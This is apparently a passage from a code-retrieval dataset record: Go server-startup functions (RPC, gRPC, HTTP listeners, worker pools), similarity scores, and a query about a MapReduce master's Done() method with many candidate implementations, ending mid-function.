{\n\t\tfor _, p := range pr.Probes {\n\t\t\tgo p.Start(ctx, dataChan)\n\t\t}\n\t\treturn\n\t}\n\tpr.startProbesWithJitter(ctx, dataChan)\n}", "func listen(addr string, srcvr ...interface{}) error {\n\tvar err error\n\tfor _, v := range srcvr {\n\t\tif err = rpc.Register(v); err != nil {\n\t\t\treturn err\n\t\t}\n\t}\n\tl, err := net.Listen(\"tcp\", addr)\n\tif err != nil {\n\t\treturn err\n\t}\n\tfor {\n\t\tconn, err := l.Accept()\n\t\tif err != nil {\n\t\t\tlog.Print(\"Error: accept rpc connection\", err.Error())\n\t\t\tcontinue\n\t\t}\n\t\tgo func(conn net.Conn) {\n\t\t\tdefer func() {\n\t\t\t\tif err := recover(); err != nil {\n\t\t\t\t\tlog.Println(\"Error: Rpc Call Recover\", err, string(debug.Stack()))\n\t\t\t\t}\n\t\t\t}()\n\t\t\tbuf := bufio.NewWriter(conn)\n\t\t\tsrv := &gobServerCodec{\n\t\t\t\trwc: conn,\n\t\t\t\tdec: gob.NewDecoder(conn),\n\t\t\t\tenc: gob.NewEncoder(buf),\n\t\t\t\tencBuf: buf,\n\t\t\t}\n\t\t\tdefer srv.Close()\n\t\t\terr = rpc.ServeRequest(srv)\n\t\t\tif err != nil {\n\t\t\t\tlog.Print(\"Error: rpc server\", err.Error())\n\t\t\t}\n\t\t}(conn)\n\t}\n}", "func run() {\n\tlogs.Start()\n\n\t// Send all data for the centralized database\n\tgo store.push()\n\tstore.Lock()\n\tdefer store.Unlock()\n\n\t// Creating the listener\n\tconfigData := config.GetConfig()\n\twatcher(configData)\n}", "func main() {\n handleRequests()\n}", "func main() {\n\tlis, err := net.Listen(\"tcp\", port)\n\tif err != nil {\n\t\tlog.Fatalf(\"Failed to start gRPC server: %v\", err)\n\t}\n\n\t// Creates a new gRPC server\n\tsrvr := grpc.NewServer()\n\tds := crawlerDS{visitedUrls: make(map[string]bool),\n\t\turlOnChannel: make(map[string]bool),\n\t\tsiteURLIndex: make(map[string]*linkIndex),\n\t\tsiteIndex: 0,\n\t\tfinishedUrls: make(chan string),\n\t\tsiteIndexURL: make(map[int]string),\n\t\twaitingUrls: make(chan linkIndex),\n\t\tterminate: make([]*chan int, 0)}\n\n\twg.Add(1)\n\tgo ds.startCrawling()\n\n\tpb.RegisterCrawlerServer(srvr, &server{spiderPtr: &ds})\n\tsrvr.Serve(lis)\n}", "func (w Worker) Start() {\n\tgo func() {\n\t\tfor {\n\t\t\t// register the current worker into the worker queue.\n\t\t\tw.WorkerPool <- w.JobChannel\n\n\t\t\tselect {\n\t\t\tcase job := <-w.JobChannel:\n\t\t\t\t// we have received a work request.\n\t\t\t\tif err := job.Do(); err != nil {\n\t\t\t\t\tlog.Printf(\"Error job.Do() : %v\\n\", err.Error())\n\t\t\t\t}\n\n\t\t\tcase <-w.quit:\n\t\t\t\treturn\n\t\t\t}\n\t\t}\n\t}()\n}", "func spawnListener(addr string) {\n\tfmt.Println(addr)\n\n\tbRPC := new(BrokerRPCServer)\n\tserver := rpc.NewServer()\n\tserver.Register(bRPC)\n\n\ttcpAddr, err := net.ResolveTCPAddr(\"tcp\", \"0.0.0.0:8000\")\n\t// tcpAddr, err := net.ResolveTCPAddr(\"tcp\", config.BrokerIP)\n\tif err != nil {\n\t\tfmt.Fprintf(os.Stderr, err.Error())\n\t}\n\n\tlistener, err := net.ListenTCP(\"tcp\", tcpAddr)\n\tif err != nil {\n\t\tfmt.Fprintf(os.Stderr, err.Error())\n\t}\n\n\tfmt.Printf(\"Serving Server at: %v\\n\", config.BrokerIP)\n\n\tvrpc.ServeRPCConn(server, listener, logger, loggerOptions)\n}", "func handleRpcConnection() {\n\n\tfortuneServerRPC := new(FortuneServerRPC)\n\trpc.Register(fortuneServerRPC)\n\n\ttcpAddress, err := net.ResolveTCPAddr(\"tcp\", fserverTcpG)\n\thandleError(err)\n\n\t// Listen for Tcp connections\n\tln, err := net.ListenTCP(\"tcp\", tcpAddress)\n\thandleError(err)\n\n\tfor {\n\n\t\tconn, err := ln.AcceptTCP()\n\t\thandleError(err)\n\t\tgo rpc.ServeConn(conn)\n\t}\n\n\tln.Close()\n}", "func (h *Host) threadedListen(closeChan chan struct{}) {\n\tdefer close(closeChan)\n\n\t// Receive connections until an error is returned by the listener. When an\n\t// error is returned, there will be no more calls to receive.\n\tfor {\n\t\t// Block until there is a connection to handle.\n\t\tconn, err := h.listener.Accept()\n\t\tif err != nil {\n\t\t\treturn\n\t\t}\n\n\t\tgo h.threadedHandleConn(conn)\n\n\t\t// Soft-sleep to ratelimit the number of incoming connections.\n\t\tselect {\n\t\tcase <-h.tg.StopChan():\n\t\tcase <-time.After(rpcRatelimit):\n\t\t}\n\t}\n}", "func main() {\n\tvar (\n\t\terr error\n\t\tlis net.Listener\n\t)\n\tif lis, err = net.Listen(\"tcp\", env.MustHget(\"mail\", \"addr\")); err != nil {\n\t\tdie(err)\n\t}\n\n\tsrv := grpc.NewServer()\n\tpb.RegisterMailServiceServer(srv, &mailServer{})\n\tif err = srv.Serve(lis); err != nil {\n\t\tdie(err)\n\t}\n}", "func init() {\r\n\tmux := http.NewServeMux()\r\n\trpcserver.RegisterRPCFuncs(mux, Routes)\r\n\twm := rpcserver.NewWebsocketManager(Routes, nil)\r\n\tmux.HandleFunc(websocketEndpoint, wm.WebsocketHandler)\r\n\tgo func() {\r\n\t\t_, err := rpcserver.StartHTTPServer(tcpAddr, mux)\r\n\t\tif err != nil {\r\n\t\t\tpanic(err)\r\n\t\t}\r\n\t}()\r\n\r\n\tmux2 := http.NewServeMux()\r\n\trpcserver.RegisterRPCFuncs(mux2, Routes)\r\n\twm = rpcserver.NewWebsocketManager(Routes, nil)\r\n\tmux2.HandleFunc(websocketEndpoint, wm.WebsocketHandler)\r\n\tgo func() {\r\n\t\t_, err := rpcserver.StartHTTPServer(unixAddr, mux2)\r\n\t\tif err != nil {\r\n\t\t\tpanic(err)\r\n\t\t}\r\n\t}()\r\n\r\n\t// wait for servers to start\r\n\ttime.Sleep(time.Second * 2)\r\n\r\n}", "func (s *grpcServer) Run(ctx context.Context, ready func()) error {\n\tlogger := log.WithContext(ctx)\n\ts.server.Init(ctx, nil)\n\tlistener, err := net.Listen(\"tcp\", s.cfg.Address)\n\tif err != nil {\n\t\tlogger.WithError(err).WithField(\"address\", s.cfg.Address).Error(\"unable to listen tcp address\")\n\t\treturn err\n\t}\n\n\tlogger.Info(\"starting of grpc server...\")\n\ts.server.Init(ctx, nil)\n\tmaster.RegisterMasterServer(s.server.server, s.server)\n\tif err := s.server.server.Serve(listener); err != nil {\n\t\treturn err\n\t}\n\treturn nil\n}", "func (svr *Server) Start() (err error) {\n\n\tfor {\n\t\tcliConn, err := svr.listener.Accept()\n\t\tif err != nil {\n\t\t\treturn err\n\t\t}\n\n\t\t// save connection\n\t\tsvr.mtx.Lock()\n\t\tsvr.connList.PushBack(cliConn)\n\t\tsvr.mtx.Unlock()\n\n\t\tsvr.logger.Debug(\"Accept new connection\", \"RemoteAddr\", cliConn.RemoteAddr())\n\t\tgo svr.readRequest(cliConn)\n\t}\n}", "func (c *raftClient) run(ctx context.Context, wg *sync.WaitGroup, n *Node) {\n\tdefer wg.Done()\n\n\tn.logger.Debugw(\"remote node client worker start running\", c.logKV()...)\n\n\t// Add grpc client interceptor for logging, and metrics collection (if enabled). We do not use payload logging\n\t// because it is currently nailed to InfoLevel.\n\tgcl := n.logger.Named(\"GRPC_C\").Desugar()\n\tunaryInterceptorChain := []grpc.UnaryClientInterceptor{}\n\tif c.node.verboseLogging {\n\t\tunaryInterceptorChain = append(unaryInterceptorChain,\n\t\t\tgrpc_zap.UnaryClientInterceptor(\n\t\t\t\tgcl, grpc_zap.WithLevels(func(code codes.Code) zapcore.Level { return zapcore.DebugLevel })))\n\t}\n\n\tif n.messaging.clientUnaryInterceptorForMetrics != nil {\n\t\tunaryInterceptorChain = append(unaryInterceptorChain, n.messaging.clientUnaryInterceptorForMetrics)\n\t}\n\n\t// Prepend our options such that they can be overridden by the client options if they overlap.\n\toptions := []grpc.DialOption{\n\t\tgrpc.WithBlock(),\n\t\tgrpc.WithKeepaliveParams(keepalive.ClientParameters{\n\t\t\tTime: time.Second * defaultInactivityTriggeredPingSeconds,\n\t\t\tTimeout: time.Second * defaultTimeoutAfterPingSeconds,\n\t\t}),\n\t\tgrpc.WithUnaryInterceptor(grpc_middleware.ChainUnaryClient(unaryInterceptorChain...))}\n\n\t// Append client provided dial options specifically for this client to server connection.\n\tif n.config.clientDialOptionsFn != nil {\n\t\toptions = append(options, n.config.clientDialOptionsFn(n.messaging.server.localAddr, c.remoteAddress)...)\n\t}\n\n\tconn, err := grpc.DialContext(ctx, c.remoteAddress, options...)\n\tif err != nil {\n\t\tif ctx.Err() == nil {\n\t\t\t// This is not a shutdown. We have taken a fatal error (i.e. this is not a transient error). Possibly\n\t\t\t// a misconfiguration of the options, for example. We will return a fatal error.\n\t\t\tn.logger.Errorw(\"remote node client worker aborting\", append(c.logKV(), raftErrKeyword, err)...)\n\t\t\tn.signalFatalError(raftErrorf(\n\t\t\t\tRaftErrorClientConnectionUnrecoverable, \"grpc client connection to remote node, err [%v]\", err))\n\t\t}\n\t\treturn\n\t}\n\n\tdefer func() { _ = conn.Close() }()\n\n\tn.logger.Debugw(\"remote node client worker connected\",\n\t\tappend(c.logKV(), \"connState\", conn.GetState().String())...)\n\tc.grpcClient = raft_pb.NewRaftServiceClient(conn)\n\n\tfor {\n\t\tselect {\n\t\tcase e := <-c.eventChan.channel:\n\t\t\t// The event handler carries all the context necessary, and equally handles the\n\t\t\t// feedback based on the outcome of the event.\n\t\t\te.handle(ctx)\n\n\t\tcase <-ctx.Done():\n\t\t\t// We're done. By this point we will have cleaned up and we're ready to go.\n\t\t\tn.logger.Debugw(\"remote node client worker shutting down\", c.logKV()...)\n\t\t\treturn\n\t\t}\n\n\t}\n\n}", "func servidor(in chan Request, fim chan int) {\r\n\t\t\r\n\tfor {\r\n\t\t// le requisicao do cliente\r\n\t\treq := <-in\r\n\r\n\t\t// acha uma thread disponivel para \r\n\t\t// enviar a requisicao\r\n\t\tvar canal Thread = achaCanal()\r\n\r\n\t\t// envia requisicao para a thread\r\n\t\tcanal.thr <- req\r\n\t}\r\n}", "func StartRPC() {\n\t/*\n\t * Will register the user auth rpc with rpc package\n\t * We will listen to the http with rpc of auth module\n\t * Then we will start listening to the rpc port\n\t */\n\t//Registering the auth model with the rpc package\n\trpc.Register(new(aConfig.RPCAuth))\n\n\t//registering the handler with http\n\trpc.HandleHTTP()\n\tl, e := net.Listen(\"tcp\", \":\"+RPCPort)\n\tif e != nil {\n\t\tlog.Fatal(\"Error while listening to the rpc port\", e.Error())\n\t}\n\tgo http.Serve(l, nil)\n}", "func (stub *RunnerStub) StartListeningAndBlock(ctx context.Context, commandrunner <-chan int) error {\n\n\tstub.channel.NatsNativeConn.Subscribe(stub.channel.NatsPublishName, func(msg *natsio.Msg) {\n\t\tcarrier := requests.RequestCarrier{}\n\n\t\tif err := json.Unmarshal(msg.Data, &carrier); err != nil {\n\t\t\tlog := fmt.Errorf(\"[Error]: stub: unable to unmarshal command from json: %s\", err)\n\t\t\tfmt.Println(log)\n\t\t}\n\n\t\tswitch carrier.CarrierForType {\n\t\tcase requests.RunnerCancel:\n\t\t\tstub.cancellationHandler()\n\t\tcase requests.RunnerHealth:\n\t\t\tisHealthy := stub.healthyHandler()\n\t\t\trply := requests.NewRunnerHealthRequest()\n\t\t\trply.IsHealthy = isHealthy\n\t\t\tcarrier.Data = rply\n\n\t\t\tif json, err := json.Marshal(carrier); err != nil {\n\t\t\t\tmsg.Respond(json)\n\t\t\t} else {\n\t\t\t\tlog := fmt.Errorf(\"[Error]: stub: unable to marshal command from json: %s\", err)\n\t\t\t\tfmt.Println(log)\n\t\t\t}\n\t\t}\n\t})\n\n\tselect {\n\tcase <-commandrunner:\n\t}\n\treturn nil\n}", "func Run() (err error) {\n\n\t// Register Message Queue handler\n\thandler := mq.MsgHandler{Handler: msgHandler, UserData: nil}\n\tsbi.handlerId, err = sbi.mqLocal.RegisterHandler(handler)\n\tif err != nil {\n\t\tlog.Error(\"Failed to register local Msg Queue listener: \", err.Error())\n\t\treturn err\n\t}\n\tlog.Info(\"Registered local Msg Queue listener\")\n\n\treturn nil\n}", "func (s *Server) Start(ctx context.Context, cfg config.Config) error {\n\ts.mtx.Lock()\n\n\tcmtCfg := tmrpcserver.DefaultConfig()\n\tcmtCfg.MaxOpenConnections = int(cfg.API.MaxOpenConnections)\n\tcmtCfg.ReadTimeout = time.Duration(cfg.API.RPCReadTimeout) * time.Second\n\tcmtCfg.WriteTimeout = time.Duration(cfg.API.RPCWriteTimeout) * time.Second\n\tcmtCfg.MaxBodyBytes = int64(cfg.API.RPCMaxBodyBytes)\n\n\tlistener, err := tmrpcserver.Listen(cfg.API.Address, cmtCfg.MaxOpenConnections)\n\tif err != nil {\n\t\ts.mtx.Unlock()\n\t\treturn err\n\t}\n\n\ts.listener = listener\n\ts.mtx.Unlock()\n\n\t// configure grpc-web server\n\tif cfg.GRPC.Enable && cfg.GRPCWeb.Enable {\n\t\tvar options []grpcweb.Option\n\t\tif cfg.API.EnableUnsafeCORS {\n\t\t\toptions = append(options,\n\t\t\t\tgrpcweb.WithOriginFunc(func(origin string) bool {\n\t\t\t\t\treturn true\n\t\t\t\t}),\n\t\t\t)\n\t\t}\n\n\t\twrappedGrpc := grpcweb.WrapServer(s.GRPCSrv, options...)\n\t\ts.Router.PathPrefix(\"/\").Handler(http.HandlerFunc(func(w http.ResponseWriter, req *http.Request) {\n\t\t\tif wrappedGrpc.IsGrpcWebRequest(req) {\n\t\t\t\twrappedGrpc.ServeHTTP(w, req)\n\t\t\t\treturn\n\t\t\t}\n\n\t\t\t// Fall back to grpc gateway server.\n\t\t\ts.GRPCGatewayRouter.ServeHTTP(w, req)\n\t\t}))\n\t}\n\n\t// register grpc-gateway routes (after grpc-web server as the first match is used)\n\ts.Router.PathPrefix(\"/\").Handler(s.GRPCGatewayRouter)\n\n\terrCh := make(chan error)\n\n\t// Start the API in an external goroutine as Serve is blocking and will return\n\t// an error upon failure, which we'll send on the error channel that will be\n\t// consumed by the for block below.\n\tgo func(enableUnsafeCORS bool) {\n\t\ts.logger.Info(\"starting API server...\", \"address\", cfg.API.Address)\n\n\t\tif enableUnsafeCORS {\n\t\t\tallowAllCORS := handlers.CORS(handlers.AllowedHeaders([]string{\"Content-Type\"}))\n\t\t\terrCh <- tmrpcserver.Serve(s.listener, allowAllCORS(s.Router), servercmtlog.CometLoggerWrapper{Logger: s.logger}, cmtCfg)\n\t\t} else {\n\t\t\terrCh <- tmrpcserver.Serve(s.listener, s.Router, servercmtlog.CometLoggerWrapper{Logger: s.logger}, cmtCfg)\n\t\t}\n\t}(cfg.API.EnableUnsafeCORS)\n\n\t// Start a blocking select to wait for an indication to stop the server or that\n\t// the server failed to start properly.\n\tselect {\n\tcase <-ctx.Done():\n\t\t// The calling process canceled or closed the provided context, so we must\n\t\t// gracefully stop the API server.\n\t\ts.logger.Info(\"stopping API server...\", \"address\", cfg.API.Address)\n\t\treturn s.Close()\n\n\tcase err := <-errCh:\n\t\ts.logger.Error(\"failed to start API server\", \"err\", err)\n\t\treturn err\n\t}\n}", "func startHTTPServer(name string, waitChan chan<- WaitEntry, server *http.Server) {\n\tgo func() {\n\t\terr := server.ListenAndServe()\n\n\t\tif err != nil && err != http.ErrServerClosed {\n\t\t\twaitChan <- WaitEntry{\n\t\t\t\tname: name,\n\t\t\t\terr: fmt.Errorf(\"error running http server: %s\", err.Error()),\n\t\t\t}\n\t\t}\n\t}()\n}", "func main() {\n\t// Listen an actual port.\n\tlis, err := net.Listen(\"tcp\", fmt.Sprintf(\":%d\", 9093))\n\tif err != nil {\n\t\tlog.Fatalf(\"failed to listen: %v\", err)\n\t}\n\tdefer lis.Close()\n\n\t// Create a HTTP server for prometheus.\n\thttpServer := &http.Server{Handler: promhttp.HandlerFor(reg, promhttp.HandlerOpts{}), Addr: fmt.Sprintf(\"0.0.0.0:%d\", 9092)}\n\n\t// Create a gRPC Server with gRPC interceptor.\n\tgrpcServer := grpc.NewServer(\n\t\tgrpc.StreamInterceptor(grpcMetrics.StreamServerInterceptor()),\n\t\tgrpc.UnaryInterceptor(grpcMetrics.UnaryServerInterceptor()),\n\t)\n\n\t// Create a new api server.\n\tdemoServer := newDemoServer()\n\n\t// Register your service.\n\tpb.RegisterDemoServiceServer(grpcServer, demoServer)\n\n\t// Initialize all metrics.\n\tgrpcMetrics.InitializeMetrics(grpcServer)\n\n\t// Start your http server for prometheus.\n\tgo func() {\n\t\tif err := httpServer.ListenAndServe(); err != nil {\n\t\t\tlog.Fatal(\"Unable to start a http server.\")\n\t\t}\n\t}()\n\n\t// Start your gRPC server.\n\tlog.Fatal(grpcServer.Serve(lis))\n}", "func (c *Connection) Worker() {\n\n\tfor {\n\t\tselect {\n\t\tcase _ = <-c.workerctx.Done():\n\t\t\treturn\n\t\tcase inData := <-c.In:\n\t\t\theader, _ := wire.GetHeader(inData)\n\n\t\t\tif header.CmdType == wire.CMD_EXIT {\n\t\t\t\tos.Exit(0)\n\t\t\t}\n\n\t\t\tlogg.Debug(\"processing server cmd\")\n\n\t\t\tcmdFunc, ok := cmd.CommandBuffer[header.CmdType]\n\t\t\tif !ok {\n\t\t\t\tlogg.Log(\"Command not implemented\")\n\t\t\t\tbreak\n\t\t\t}\n\t\t\tnewctx1, _ := context.WithCancel(c.workerctx)\n\t\t\tgo cmdFunc(inData, c.Out, newctx1)\n\t\t}\n\t}\n\n}", "func main() {\n\tif len(os.Args) < 2 {\n\t\tlog.Fatalf(\"Usage: %s <port to listen on>\", os.Args[0])\n\t}\n\tport := os.Args[1]\n\n\tfile, _ := os.Open(\"config.json\")\n\tdefer file.Close()\n\tdecoder := json.NewDecoder(file)\n\tconfig := Config{}\n\terr := decoder.Decode(&config)\n\tif err != nil {\n\t\tlog.Fatalf(\"failed to get configuration: %v\", err)\n\t}\n\n\n\tlis, err := net.Listen(\"tcp\", fmt.Sprintf(\":%s\", port))\n\tif err != nil {\n\t\tlog.Fatalf(\"failed to listen: %v\", err)\n\t}\n\n\ts := api.Server{\n\t\tn: config.every_nth_request_slow,\n\t\tdelay: config.seconds_delay,\n\t}\n\tgrpcServer := grpc.NewServer()\n\tapi.RegisterRandomStrServer(grpcServer, &s)\n\n\tif err := grpcServer.Serve(lis); err != nil {\n\t\tlog.Fatalf(\"failed to serve: %s\", err)\n\t}\n}", "func Start() {\n\t{\n\t\t// Creating a grpc server, use WithInsecure to allow http connections\n\t\tgrpcServer := grpc.NewServer()\n\n\t\t// Creates an instance of Info\n\t\tinfoService := services.NewInfo()\n\n\t\t// Creates an instance of Node\n\t\tnodeService := services.NewNode()\n\n\t\t// This helps clients determine which services are available to call\n\t\treflection.Register(grpcServer)\n\n\t\t// Similar to registering handlers for http\n\t\tprotos.RegisterInfoServer(grpcServer, infoService)\n\n\t\tprotos.RegisterNodeServer(grpcServer, nodeService)\n\n\t\tl, err := net.Listen(\"tcp\", Address)\n\t\tif err != nil {\n\t\t\tklog.Errorf(\"Unable to listen %v\", err)\n\t\t\tos.Exit(1)\n\t\t}\n\n\t\t// Listen for requests\n\t\tklog.Infof(\"Starting server at : %v \", Address)\n\t\terr = grpcServer.Serve(l)\n\t\tif err != nil {\n\t\t\tklog.Errorf(\"Unable to Serve %v\", err)\n\t\t}\n\n\t}\n}", "func (w *worker) Start() {\n\tgo func() {\n\t\tfor {\n\t\t\t// consume done ,then worker reenter workerPool\n\t\t\tw.workerPool <- w.taskChannel\n\t\t\tselect {\n\t\t\tcase task := <-w.taskChannel:\n\t\t\t\t// received a work request and consume it\n\t\t\t\tif err := task.Consume(); err != nil {\n\t\t\t\t\tlog.Printf(\"Task Consume fail: %v\", err.Error())\n\t\t\t\t}\n\t\t\tcase <-w.quit:\n\t\t\t\treturn\n\t\t\t}\n\t\t}\n\t}()\n}", "func StartServer(cleanUpChan chan int){\n\tGrpcServer = &Server{\n CleanUpChan:cleanUpChan ,\n\t GrpcServer: grpc.NewServer(),\n\t}\n\tregisterGrpcServices(GrpcServer.GrpcServer)\n\tif err := GrpcServer.GrpcServer.Serve(getListner(port)); err != nil {\n\t\tpanic(err)\n\t}\n}", "func Run(ctx context.Context, network, address string) error {\n\tlistener, err := net.Listen(network, address)\n\tif err != nil {\n\t\treturn err\n\t}\n\tdefer func() {\n\t\tif err := listener.Close(); err != nil {\n\t\t\tlog.Fatalf(\"Failed to close %s %s: %v\", network, address, err)\n\t\t}\n\t}()\n\n\tserver := grpc.NewServer()\n\tpb.RegisterEchoServiceServer(server, newEchoServer())\n\n\tgo func() {\n\t\tdefer server.GracefulStop()\n\t\t<-ctx.Done()\n\t}()\n\treturn server.Serve(listener)\n}" ]
[ "0.6423443", "0.6312183", "0.6110611", "0.60416585", "0.58672446", "0.58397245", "0.5838455", "0.5836735", "0.58064723", "0.5799099", "0.57792133", "0.5770807", "0.57646734", "0.5764245", "0.5761796", "0.57543683", "0.5745381", "0.5742795", "0.5734523", "0.5725471", "0.5719503", "0.571907", "0.5716183", "0.57090765", "0.57089496", "0.57074463", "0.5706773", "0.56984186", "0.5692863", "0.56922376", "0.5691892", "0.5691259", "0.56802684", "0.56620055", "0.56618285", "0.56548095", "0.56477123", "0.56350386", "0.5634753", "0.5603655", "0.56019735", "0.5598317", "0.5593743", "0.5590526", "0.5577334", "0.55518323", "0.55414337", "0.5538579", "0.55334616", "0.55300605", "0.55254865", "0.5524195", "0.5523956", "0.55219245", "0.5519106", "0.55106175", "0.55007213", "0.54929096", "0.5488797", "0.5485133", "0.548442", "0.5477498", "0.5466815", "0.546262", "0.54623914", "0.5462028", "0.5457494", "0.5453441", "0.54502785", "0.5448549", "0.5448267", "0.54422206", "0.54403335", "0.54316264", "0.54230094", "0.54229116", "0.5422453", "0.5421794", "0.54188293", "0.5418445", "0.5415064", "0.5411405", "0.5406425", "0.5399592", "0.5392646", "0.5392506", "0.53915274", "0.5388422", "0.5378392", "0.53782237", "0.53778857", "0.53696126", "0.53642404", "0.5359703", "0.53559303", "0.535433", "0.53402615", "0.53357965", "0.53354776", "0.5330781", "0.5328314" ]
0.0
-1
Done check whether it can stop. main/mrmaster.go calls Done() periodically to find out if the entire job has finished.
func (m *Master) Done() bool { // ret := (JobDown == m.phase) // Your code here. return JobDown == m.phase }
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "func (m *Master) Done() bool {\n\t// Your code here.\n\treturn m.jobs.empty(ReduceJob)\n}", "func (m *Master) Done() bool {\n\tret := false\n\tfmt.Printf(\"MapTasks: %v\\n\", m.mapTasks)\n\tfmt.Printf(\"RedTasks: %v\\n\", m.reduceTasks)\n\tfmt.Printf(\"nReduce: %d, nMap: %d\\n\", m.nReduce, m.nMap)\n\t// Your code here.\n\t// all tasks have finished\n\tif m.hasGenerateReduceTasks && m.nReduce <= 0 && m.nMap <= 0 {\n\t\tret = true\n\t\tfmt.Println(\"The job has finished!\")\n\t}\n\treturn ret\n}", "func (m *Master) Done() bool {\r\n\tret := false\r\n\r\n\t// Your code here.\r\n\t// wg.Wait()\r\n\r\n\tret = <-m.done\r\n\r\n\tm.mux.Lock()\r\n\tif len(m.failedReduceFinish) != 0 {\r\n\t\t// log.Printf(\"Crashed Workers: %v\\n\", m.failedReduceFinish)\r\n\t\tfor _, taskNo := range m.failedReduceFinish {\r\n\t\t\tfilename := \"mr-out-\" + strconv.Itoa(taskNo)\r\n\t\t\terr := os.Remove(filename)\r\n\t\t\tif err != nil {\r\n\t\t\t\t// log.Println(\"Delete file failed: \", filename)\r\n\t\t\t}\r\n\t\t}\r\n\t}\r\n\tm.mux.Unlock()\r\n\r\n\treturn ret\r\n}", "func (m *Master) Done() bool {\n\tret := false\n\n\t// Your code here.\n\tm.mutex.Lock()\n\tdefer m.mutex.Unlock()\n\n\t// clear timeout task\n\tfor i, taskPatchTime := range m.todoMapTask {\n\t\tif taskPatchTime != 0 && taskPatchTime+10 < time.Now().Unix() {\n\t\t\tfmt.Printf(\"MapTask Timeout: TaskID:%d\\n\", i)\n\t\t\tm.todoMapTask[i] = 0\n\t\t}\n\t}\n\tfor i, taskPatchTime := range m.todoReduceTask {\n\t\tif taskPatchTime != 0 && taskPatchTime+10 < time.Now().Unix() {\n\t\t\tfmt.Printf(\"ReduceTask Timeout: TaskID:%d\\n\", i)\n\t\t\tm.todoReduceTask[i] = 0\n\t\t}\n\t}\n\n\tret = len(m.todoMapTask) == 0 && len(m.todoReduceTask) == 0\n\n\treturn ret\n}", "func (m *Master) Done() bool {\n\tsuccNum := atomic.LoadInt64(&m.JobManager.SuccNum)\n\tif succNum == int64(m.Rnum) {\n\t\tclose(m.JobManager.Jobs) // 安全关闭\n\t\tclose(m.JobManager.RShuffleChan)\n\t\treturn true\n\t}\n\treturn false\n}", "func (m *Master) Done() bool {\n\tret := false\n\n\t// Your code here.\n\tm.Mutex.Lock()\n\tdefer m.Mutex.Unlock()\n\tif m.Phase == Reduce && len(m.Undone) == 0 && len(m.Doing) == 0 {\n\t\tret = true\n//\t\tlog.Printf(\"all tasks finished\")\n\t}\n\n\treturn ret\n}", "func (m *Master) Done() bool {\n\tif m.State == Success {\n\t\treturn true\n\t}\n\n\t// Your code here.\n\tif m.State == Map {\n\t\treturn false\n\t}\n\tfor _, v := range m.ReduceTask {\n\t\tif v.Status != Finish {\n\t\t\treturn false\n\t\t}\n\t}\n\tm.State = Success\n\treturn true\n}", "func (m *Master) Done() bool {\n\tret := false\n\n\t// Your code here.\n\tif m.reduceFinished == m.reduceTasks {\n\t\tret = true\n\t}\n\n\treturn ret\n}", "func (m *Master) Done() bool {\n\n\t// Your code here.\n\tm.mutex.Lock()\n\tdefer m.mutex.Unlock()\n\treturn m.state == TearDown\n}", "func (m *Master) Done() bool {\n\tret := false\n\t// Your code here.\n\tm.mutex.Lock()\n\tret = m.isFinished_\n\tm.mutex.Unlock()\n\treturn ret\n}", "func (m *Master) Done() bool {\n\tret := false\n\n\n\tif (m.taskPhase == ExitPhase) {\n\t\tret = true\n\t}\n\t// Your code here.\n\n\n\treturn ret\n}", "func (m *Master) Done() bool {\n\tret := false\n\n\t// Your code here.\n\tif m.remainReduceCount == 0 {\n\t\tret = true\n\t}\n\n\treturn ret\n}", "func (m *Master) Done() bool {\n\n\t// Your code here.\n\n\treturn m.end\n}", "func (m *Master) Done() bool {\n\tret := false\n\n\t// Your code here.\n\t// show taskSummary\n\tlogger.Debug(fmt.Sprintf(\"TaskSummary:\\n%s\", m.printTaskSummary()))\n\n\t// Increment SinceLastHeartbeat field for each in-progress tasks\n\tm.increaseSinceLastHeartbeat()\n\n\t// Stop and reschedule task for task with SinceLastHeartbeat > 10\n\t// TODO: Implement fail recovery\n\tdeadTasks, ok := m.checkDeadWorker()\n\tif ok {\n\t\t// fail recovery\n\t\tfor _, dTaskInfo := range deadTasks {\n\t\t\tlogger.Debug(\"Fail recovery for deadWOrker() and deadTask() ...\")\n\t\t\tm.mu.Lock()\n\t\t\tm.aliveWorkerCount -= 1\n\t\t\tm.deadWorkerCount += 1\n\t\t\tm.mu.Unlock()\n\t\t\tm.resetTaskToIdle(dTaskInfo.TaskId)\n\t\t}\n\n\t}\n\n\t// Check if there is any undo task left\n\tif m.checkAllTaskFinished() {\n\t\tret = true\n\t}\n\n\treturn ret\n}", "func (m *Master) Done() bool {\n\t// Your code here.\n\tm.mu.Lock()\n\tdefer m.mu.Unlock()\n\n\tnum_active_client := len(m.clients)\n\tfmt.Println(\"Active clients: \" + strconv.Itoa(num_active_client))\n\n\tdone := true\n\tfor job, job_status := range m.jobs {\n\t\tfmt.Println(job + \": \" + job_status)\n\t\tif job_status != \"done\" {\n\t\t\tdone = false\n\t\t}\n\t}\n\treturn done\n}", "func (m *Master) Done() bool {\n\tret := false\n\n\t// Your code here.\n\tif len(m.DoneReduceTask) == m.NReduce {\n\t\tret = true\n\t}\n\n\treturn ret\n}", "func (m *Master) Done() bool {\n\n\t// Your code here.\n\treturn m.ReduceFinish\n}", "func (m *Master) Done() bool {\n\t// Your code here.\n\n\treturn m.done\n}", "func (m *Master) Done() bool {\n\tif m.done {\n\t\tfmt.Println(\"All task finished. Exiting...\")\n\t}\n\treturn m.done\n}", "func (m *Master) Done() bool {\n\tret := false\n\n\t// Your code here.\n\tif len(m.completedTasks[0])==m.M && len(m.completedTasks[1])==m.R {\n\t\tret = true\n\t}\n\treturn ret\n}", "func (m *Master) Done() bool {\n\tret := false\n\n\treturn ret\n}", "func (m *Master) Done() bool {\n\t// Your code here.\n\tm.mu.Lock()\n\tdefer m.mu.Unlock()\n\n\treturn m.done\n}", "func (m *Master) Done() bool {\n\t// Re-issue map tasks if the master waits for more than ten seconds.\n\tfor i, v := range m.mapStates {\n\t\tif v.state == 0 {\n\t\t\treturn false\n\t\t}\n\t\tif v.state == 1 {\n\t\t\telapsed := time.Since(v.t)\n\t\t\tif elapsed > time.Second*10 {\n\t\t\t\tm.mapStates[i].state = 0\n\t\t\t}\n\t\t\treturn false\n\t\t}\n\t}\n\t// Re-issue reduce tasks if the master waits for more than ten seconds.\n\tfor i, v := range m.reduceStates {\n\t\tif v.state == 0 {\n\t\t\treturn false\n\t\t}\n\t\tif v.state == 1 {\n\t\t\telapsed := time.Since(v.t)\n\t\t\tif elapsed > time.Second*10 {\n\t\t\t\tm.reduceStates[i].state = 0\n\t\t\t}\n\t\t\treturn false\n\t\t}\n\t}\n\t// All map and reduce tasks are finished.\n\treturn true\n}", "func (m *Master) Done() bool {\n\tm.mu.Lock()\n\tdefer 